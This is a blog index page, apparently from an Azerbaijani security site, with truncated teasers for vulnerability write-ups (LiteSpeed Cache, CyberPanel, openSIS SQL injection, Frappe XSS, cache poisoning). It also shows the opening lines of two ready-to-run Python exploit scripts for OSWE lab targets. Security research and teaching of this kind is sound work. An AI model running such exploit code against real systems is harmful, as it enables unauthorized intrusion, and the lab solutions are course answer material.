CVE-2024-28000 Analizi və istismarlar haqqında.


Author: Huseyn Gadashov Məqalə xüsusi olaraq xakep.ru üçün yazılmışdır. CVE işıq sürəti ilə. LiteSpeed Cache üçün açıq eksploiti düzəldirik Bu gün mən LiteSpeed Cache-dəki bir zəifliyi araşdıracağam — saytların işini sürətləndirmək üçün populyar bir plagin. Bu plagin WooCommerce, bbPress, ClassicPress və Yoast kimi məşhur mühərriklərlə işləyir və bu günə qədər 5 milyondan çox qurğusu var. Gəlin baxaq, necə ki, keyfiyyətsiz təsadüfi ədədlərin yaradılması admin imtiyazlarına yüksəliş imkanına gətirib çıxarıb. Xəbərlərdə hansısa möhtəşəm bir zəiflik yayımlandıqdan sonra, dörd tip insanı müşahidə etmək olar:…
Read more ⟶

Patch-ların pıçıldadığı boşluqlar: Cyberpanel-in bildirmədiyi boşluqların analizi


Huseyn Gadashov Mən hər zaman bütün zəiflikləri “giriş nəzarətinin keçilməsi” adlandıran insanlarla problemlər yaşayıram. Anlayın ki, saytda SQL inyeksiyaları olması və onların vasitəsilə istifadəçi əldə etməniz və ya özünüzü admin etməniz, hərçənd girişin keçilməsi və ya imtiyazların artırılması demək olsa da, bu, giriş nəzarəti ilə bağlı zəiflik deyil. Nəhayət, developer-in giriş yoxlamasını əlavə etməyi unutduğu bir nümunə əlimizə düşdü — CVE-2024-51567. Həmçinin (təsadüfən), bu məhsulda əvvəlcə bildirilməyən zəiflikləri aradan qaldıran patch-lar var.…
Read more ⟶

OpenSIS-də boşluqlar. Canlı nümunədən istifadə edərək SQL inyeksiyaların təhlili.


Huseyn Gadashov Məqalənin Mündəricatı Loqlaşdırma SQL inyeksiyası haqqında bir az Autentifikasiyasız SQLi Autentifikasiyalı SQLi Məktəb Konfiqurasiyası Tələbələr İstifadəçilər Parametrlərin doğrulanması Nəticələr Bu məqalədə bir neçə SQL inyeksiyası növünü real nümunə—openSIS tətbiqi üzərində araşdıracağıq, burada mən ciddi problemlər tapdım. Əgər PHP kodunda potensial problemləri aşkar etməyi öyrənmək istəyirsənsə, bu material canlı illüstrasiya olmalıdır. Xüsusilə, SQLi mövzusunu öyrənmək istəyən yeni başlayanlar üçün faydalı olacaq. Məlumat Əgər sən hələ SQL inyeksiyalarının necə işlədiyini bilmirsənsə, sənin üçün xüsusi olaraq “SQL-inyeksiyalar.…
Read more ⟶

CVE-lər ilə bağlı problemlər


Huseyn Gadashov Məqalə xüsusi olaraq xakep.ru üçün yazılmışdır. Məqalənin Mündəricatı CVE nədir? CVSS nədir? CVSS-in əsas faktorları CVE-2023-39526: PrestaShop-da “zəiflik” CVE-2023-6875: Post SMTP Mailer-də xəta Administratorun istifadəçi adı nədir? Parolu unutmuşuq Elektron poçt jurnalları Parolun dəyişdirilməsi Shell yükləmək GPT ilə bum-bum exploit Nəticələr Növbəti CVE-yə baxdığımızda ilk növbədə nəyə diqqət yetiririk? Doğrudur, təhlükə səviyyəsinə, yəni CVSS qiymətləndirməsinə. Lakin bəzən bu rəqəm real təhlükə ilə uyğun gəlmir. Bu məqalədə nümunələrlə bu cür halları göstərəcəyəm və həmçinin CVE ilə bağlı digər problemləri müzakirə edəcəyik.…
Read more ⟶

XSS at Frappe Framework [AZ | RU | EN]


Huseyn Gadashov Azərbaycanca Kod:​ def sanitize_html(html, linkify=False): """ Sanitize HTML tags, attributes and style to prevent XSS attacks Based on bleach clean, bleach whitelist and html5lib's Sanitizer defaults Does not sanitize JSON, as it could lead to future problems """ import bleach from bleach.css_sanitizer import CSSSanitizer from bs4 import BeautifulSoup if not isinstance(html, str): return html elif is_json(html): return html if not bool(BeautifulSoup(html, "html.parser").find()): return html Problem:​ sanitize_html funksiyasında olan isinstance və is_json yoxlanışları html teqlərini daxil etmək üçün sui-istifadə edilə bilər.…
Read more ⟶

Top 100 OpenSource WEB Products


Huseyn Gadashov Apache HTTP Server Download: https://httpd.apache.org/download.cgi Nginx Download: https://nginx.org/en/download.html WordPress GitHub: https://github.com/WordPress/WordPress Drupal GitHub: https://github.com/drupal/drupal Joomla! GitHub: https://github.com/joomla/joomla-cms Magento Open Source GitHub: https://github.com/magento/magento2 MediaWiki GitHub: https://github.com/wikimedia/mediawiki phpBB GitHub: https://github.com/phpbb/phpbb PrestaShop GitHub: https://github.com/PrestaShop/PrestaShop OpenCart GitHub: https://github.com/opencart/opencart Moodle GitHub: https://github.com/moodle/moodle Nextcloud GitHub: https://github.com/nextcloud/server ownCloud GitHub: https://github.com/owncloud/core Ghost GitHub: https://github.com/TryGhost/Ghost Discourse GitHub: https://github.com/discourse/discourse Matomo GitHub: https://github.com/matomo-org/matomo Odoo GitHub: https://github.com/odoo/odoo Grafana GitHub: https://github.com/grafana/grafana Kibana GitHub: https://github.com/elastic/kibana Elasticsearch GitHub: https://github.com/elastic/elasticsearch GitLab Community Edition GitLab: https://gitlab.…
Read more ⟶

[SPOILER] Docedit OSWE Lab Exploit


Huseyn Gadashov Replace values to the ones you have and you are good to go! import random import requests import re import websockets import asyncio def getSid(url): newUrl = url + '/socket.io/?EIO=3&transport=polling&t=PBNk2-7' s = requests.get(newUrl) match = re.search(r'sid":"(.*?)","upgra', s.text, re.DOTALL) sid = match.group().replace('sid":"', '').replace('","upgra','').strip() newUrl = url + f'/socket.io/?EIO=3&transport=polling&t=PBNk31Z&sid={sid}' s = requests.get(newUrl) return sid async def register(url, sid, uname, cmd): headers = {'Cookie:' : f'io={sid}'} wsUrl = url.replace('http://', 'ws://').replace('https://', 'wss://') + f'/socket.…
Read more ⟶

[SPOILER] Answers OSWE Lab Exploit


Huseyn Gadashov Replace values to the ones you have and you are good to go! import time import requests import base64 import http.cookies from bs4 import BeautifulSoup from concurrent.futures import ThreadPoolExecutor import http.server import threading import random import urllib.parse import re class JavaRandom: def __init__(self, seed): self.seed = (seed ^ 0x5DEECE66D) & ((1 << 48) - 1) self.multiplier = 0x5DEECE66D self.addend = 0xB self.mask = (1 << 48) - 1 def next(self, bits): self.…
Read more ⟶

List of All Domains in the world | Bütün domenlərin siyahı | Список всех доменов [07.2024]


Hüseyn Qadaşov https://cdn.exploit.az/index.php/s/RgHeCiBZAIb5tgt/download Password | Parol: exploitaz…
Read more ⟶

Keş Zəhərlənməsi | Cache Poisoning


Hüseyn Qadaşov Bloqumuzun əsas məqsədi bu sahədə Azərbaycan dilində yazılan məzmunu genişləndirməkdir. Bu məqalə həmin istiqamətdə başlanğıcdır. Məqalə digər mövzular haqda da ola bilərdi, amma istərdim ki, həm “Senior”lar, həm də “Junior”lar üçün oxunaqlı və maraqlı bir mövzu olsun. Əsas mövzu “Keş Zəhərlənməsi”dir. Biz burada “CVE-2016-2784”ü yoxlayacağıq. Bu məqalənin məqsədi təkcə “Keş Zəhərlənməsi”ni izah etmək deyil, həm də sizə “Patch-Diff"i göstərmək və başlıqların funksiyalarını daha yaxşı başa salmaqdır. Məzmun​ Keş (Cache)…
Read more ⟶